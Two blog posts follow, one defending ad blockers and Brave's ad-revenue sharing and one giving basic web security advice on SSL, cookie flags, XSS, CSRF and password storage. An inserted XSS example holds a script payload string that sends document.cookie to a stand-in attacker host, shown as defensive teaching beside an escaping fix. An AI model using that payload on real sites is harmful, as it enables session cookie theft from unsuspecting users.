Brave: Because It’s The Best Middle Available

I’m no different from a large portion of web users who want to read content and stay safe: I use one or more ad blockers. Is this stealing website content? No. I’d be happy to be served ads if they didn’t have such a bad track record in terms of security and privacy.

Privacy

Many people are still unaware of what information they are giving up to online advertisers. In a 2013 post, VentureBeat noted:

Advertisers and the tracking companies they employ are able to gather all sorts of information about you, such as the websites you frequent and what kind of products you’re interested in — and even some scarier stuff like political views, health problems, and personal finances.

Over time the picture you provide to these private companies becomes clearer and clearer. Of course, you may not care if companies know you like chocolate chip cookies, but you may not want them to know more personal things or, worse, be able to extrapolate things about you that you haven’t even knowingly shared, not to mention government use for predictive modeling.

Malvertising

Privacy is important, but this is the bigger problem in my opinion. Malvertising has proven a successful vector for infecting users’ machines with malware: the ad network, not the site, delivers the payload, so a reputable site can expose its readers without ever being compromised itself. If you are interested in a timeline of large malvertising events, GeoEdge has a nice post. A quick summary of heavy hitters who have inadvertently exposed their readers to threats includes The New York Times, eBay, LA Times, Spotify, Answers.com, Huffington Post, MSN, BBC, AOL and the NFL. Of course, there are many more, but that list should be enough to get anyone’s attention.

Options

So what are valid options to protect personal privacy and security on the web?

Ignore Internet Content

This is the safest option, but it’s very unlikely. Everyone loses with this, as content providers get nothing from their ads and readers don’t get any news.

Go To “Safe” Sources

Another good option, but about as unlikely as the first. It takes work to find the sites that are not tracking you or injecting third-party advertising. It also assumes safe sources stay safe, but the web is a constantly evolving place and a site may be totally different between two visits.

Run an Ad Blocker

This is the most common solution today. It blocks as many ads and third-party cookies as it can and generally keeps users safe. It’s not a perfect solution, as content providers miss out on ad clicks/impressions, but the reader gets a much safer (and faster) experience.

Some sites actively block ad blockers. When I come across a site that nicely asks me to unblock its ads, I head over to Google and find another source for the same story. I don’t think I’m alone in doing that.

Use (something like) Brave That Shares Ad Revenue

This is a newer thing and the actual reason I wanted to write this post. Brave seems to be a good middle ground which attempts to keep users safe while still providing money back to content providers. In some ways Brave is acting as an arbitrator to let everyone get something out of the deal. Users get content, creators get money. Yes, Brave (and users) get a cut too, but that’s not so bad (though I’d be fine with not getting a cut at all as a user).

Here is the flow of revenue from Brave:

[Infographic: Brave revenue flow]

Unfortunately, the NAA didn’t quite grasp the above idea and has called on Brave to stop. Surprise: at least one of the companies that signed the letter has put users at risk via malvertising on multiple occasions.

Brave has posted a rebuttal in an attempt to help the NAA understand the business model and why it’s not illegal. Hopefully logic will triumph over emotion and posturing.

My Hope

My hope is that users will jump on the idea that Brave provides (whether they use Brave or not) and that the NAA will understand that it is a business model where everyone wins, even their readers.

Basic Web Security For The Average User

The Web has been around long enough that Web applications are a part of almost everyone’s daily life. Even when a user is on a mobile device they could be interacting with Web services. Sadly, there are still many applications and services out there lacking what should be the minimum security. Luckily, there are some workarounds users can apply to try to protect themselves when applications have less than stellar security practices.

Secure Sockets Layer (SSL)

What is it?

SSL keeps the Web traffic between you and the originating server encrypted, meaning it’s harder for someone else to see the data while it is in transit (the protocol doing this job today is TLS, SSL’s successor, but the old name stuck). If SSL is not in use, the Web traffic is viewable, and alterable, by anyone on the network path between you and the server: the coffee-shop Wi-Fi, your ISP, and so on.

Can I increase my safety?

The best defense is diligence. Whenever you are going to be entering data or logging in, and for everything you do after you have logged in, make sure you see ‘https:’ at the start of the URL, and don’t click through certificate warnings when you do.

For Firefox and Chrome users, the EFF provides an extension called HTTPS Everywhere which attempts to keep your browsing over SSL where possible.

Cookie Flags

What is it?

Cookies are used to identify you and to store small bits of information on the client side (your browser). Over the years a few flags have been added to cookies that make it harder for them to reach the wrong people. The server sets them in the Set-Cookie header, and the two that matter here are Secure and HttpOnly. Secure tells the browser that it should only send the cookie to the server if the connection is using SSL; over plain HTTP the cookie does not get sent with the request, so it can’t be sniffed off the wire. HttpOnly keeps the cookie out of the hands of JavaScript (document.cookie can’t read it), only sending it back to the originating server in HTTP/HTTPS requests, which limits what an XSS attack on the site can steal.
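As an added illustration of those two flags (example code written for this page, not something from the original post), here is a small simulation in plain JavaScript of the decisions a browser makes for a cookie jar. The cookie names, values and hosts are made up, and real browsers apply more rules (Path, Domain, expiry) that are skipped here.

```javascript
// Added example: how a browser applies the Secure and HttpOnly cookie flags.
// Pure simulation; the cookies and hosts below are constructed for illustration.

// Parse one Set-Cookie header value into a cookie record, keeping only
// the two flags this example is about.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    secure: false,
    httpOnly: false,
  };
  for (const attr of attrs) {
    const lower = attr.toLowerCase();
    if (lower === 'secure') cookie.secure = true;
    else if (lower === 'httponly') cookie.httpOnly = true;
  }
  return cookie;
}

// The Cookie request header a browser would attach to a request for `url`.
// Secure rule: a Secure cookie is sent only when the scheme is https.
function cookieHeaderFor(jar, url) {
  const isHttps = new URL(url).protocol === 'https:';
  return jar
    .filter((c) => !c.secure || isHttps)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// What document.cookie exposes to page script (and therefore to any XSS
// payload running on the page). HttpOnly rule: those cookies are omitted.
function documentCookie(jar) {
  return jar
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed sample headers, as a server might send them after login:
// the session token is protected both ways, the UI preference is not,
// and the legacy cookie is hidden from script but still leaks over http.
const sampleJar = [
  parseSetCookie('session=abc123; Secure; HttpOnly; Path=/'),
  parseSetCookie('theme=dark; Path=/'),
  parseSetCookie('legacy=old; HttpOnly'),
];

console.log('https request:', cookieHeaderFor(sampleJar, 'https://example.test/account'));
console.log('http request: ', cookieHeaderFor(sampleJar, 'http://example.test/account'));
console.log('document.cookie:', documentCookie(sampleJar));
```

Run it with node and note that the session cookie appears only on the https request and never in document.cookie, which is exactly the property a user wants for the cookie that proves who they are.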

Can I increase my safety?

Right now I’m not aware of any extensions which force cookies to be HttpOnly on the browser side. If you are aware of a good mitigation please comment.

Cross Site Scripting (XSS)

What is it?

OWASP defines XSS like so:

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

(Source)

Can I increase my safety?

By installing NoScript or something similar and keeping Google Safe Browsing enabled you can lessen the chance of a successful XSS attack, but it is far from a silver bullet. There is work being done to attempt to make XSS attacks much harder, but it’s not currently in use.
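To make the OWASP definition concrete, here is an added example (written for this page; it is not from the original post or from OWASP) of the mistake it describes next to the output encoding that prevents it. The comment template and the attacker’s payload are constructed for illustration; the payload is the classic one that tries to read document.cookie, which is why the HttpOnly flag above matters.

```javascript
// Added example: a reflected/stored XSS sink beside its hardened form.
// The template and payload are constructed for illustration.

// VULNERABLE: untrusted input is dropped straight into the HTML output,
// so anything the user typed is interpreted as markup by the browser.
function renderCommentUnsafe(author, text) {
  return `<p class="comment"><b>${author}</b>: ${text}</p>`;
}

// Encode the characters that can change meaning inside HTML element
// content or a double-quoted attribute value.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// FIXED: every untrusted value is encoded for the HTML context it lands in.
// The browser now shows the payload as text instead of executing it.
function renderComment(author, text) {
  return `<p class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</p>`;
}

// Crude detector, only for demonstrating the difference: does the markup
// contain a <script> tag or an inline event handler?
function containsActiveContent(html) {
  return /<script\b|\bon\w+\s*=/i.test(html);
}

// Constructed attacker payload, the kind submitted through a comment form.
const payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

console.log('unsafe:', renderCommentUnsafe('mallory', payload));
console.log('safe:  ', renderComment('mallory', payload));
```

The fix is on the server, which is the point of the "Can I increase my safety?" answer: NoScript can refuse to run the injected script on your machine, but only the application can stop emitting it.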

Cross Site Request Forgery

What is it?

Cross-site request forgeries happen when a page on one site makes the browser send a request to a different site, attempting to do something on behalf of the user. The browser attaches the user’s cookies for the target site to that request, so the target can’t tell it apart from one the user meant to make. There are many cases where this behavior is used by developers as functionality, but that doesn’t make it any less dangerous.

Can I increase my safety?

Wikipedia has a good page on the subject:

Browser extensions such as RequestPolicy (for Mozilla Firefox) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests. The NoScript extension mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing payloads from POST requests sent by untrusted sites to trusted ones.

(Source)

Password Hashing

What is it?

When an application stores passwords it should do so in a way that it doesn’t actually know the password you’ve entered. It may sound odd, but it’s fairly easy for application developers to do: the application stores a salted, deliberately slow hash of the password and checks a login by hashing what you typed and comparing. Yet sometimes they forget to implement this hashing (or the application is ancient and never was updated to do it), and when that database leaks, so does every password in it.

Can I increase my safety?

The best thing a user can do to protect against disclosure is to use a different password for each site, so a leak from one site doesn’t unlock the others. Understandably, this can sound scary: people feel like they have to remember too many passwords already. Thankfully, there are applications which can generate, store and remember these passwords and let you remember just one. Here are a few popular choices:

External References

What is it?

It’s very common for Web applications to include JavaScript, images or CSS from other locations. The reason for this is either to increase performance by using the browser’s cache, use of a content delivery network, inclusion of ads/analytics or, in some cases, laziness. The problem for the user comes when the remote content becomes unsafe or acts in ways the user is not OK with; a script included from a third party runs with the same access to the page as the site’s own code.

It can also cause problems for the application including the content. For more information see my previous post on trusting others to host your content.

Can I increase my safety?

Because, in most cases, the external references are required for the application to work, it is quite hard to fully protect against them in the browser, but there are still some things that can help.

One more thing…

While not specifically related to the bare minimum of remote Web application security, it’s important to keep your browser and extensions/plugins updated with the latest patches and supported versions. This helps protect against sites which are hosting browser-based exploits for one reason or another (of course, don’t purposely go visit such a site!). For plugins, Mozilla provides a great plugin check page which seems to work for Chrome to some degree as well. Go check your versions!